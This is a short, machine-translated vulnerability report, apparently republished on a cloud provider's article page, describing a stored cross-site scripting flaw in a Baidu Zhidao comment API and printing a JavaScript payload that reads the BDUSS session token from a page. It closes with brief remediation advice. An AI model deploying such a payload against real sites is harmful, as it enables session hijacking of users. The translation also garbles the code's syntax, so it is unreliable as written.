A sub-station XSS of Baidu can get BDUSS

Source: Internet
Author: User

A sub-station XSS of Baidu can get BDUSS
Is there a BDUSS http://zhidao.baidu.com/liuyan/detail in the truth Q & A machine? Id = 5809 now there is a lack of XSS that Baidu Knows, o -- o! I read the comments and loaded them in JSON format. The front-end page is filtered out. But the JSON request returns text/html without filtering <> http://zhidao.baidu.com/api/comment? App = article & thread_id = 10000005809 & method = get_reply & encoding = gbk & start = 0 & limit = 10 & r = 1425448854170

The next step is simple. Comments submitted:
Obtain the BDUSS using Ajax. 
Var xmlhttp; if (window. XMLHttpRequest) {xmlhttp = new XMLHttpRequest ();} else {xmlhttp = new ActiveXObject ('Microsoft. XMLHTTP ');} xmlhttp. onreadystatechange = function () {if (xmlhttp. readyState = 4 & xmlhttp. status = 200) {var res = xmlhttp. responseText; var a = res. indexOf ('bduss'); var B = res. indexOf ('"});'); alert (res. substring (a, B) ;}} xmlhttp. open ('get', '/liuyan/detail? Id = 5809 ', true); xmlhttp. send ();

Solution:

Returns the correct response header. Filter. Do not show sensitive data on the page.
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.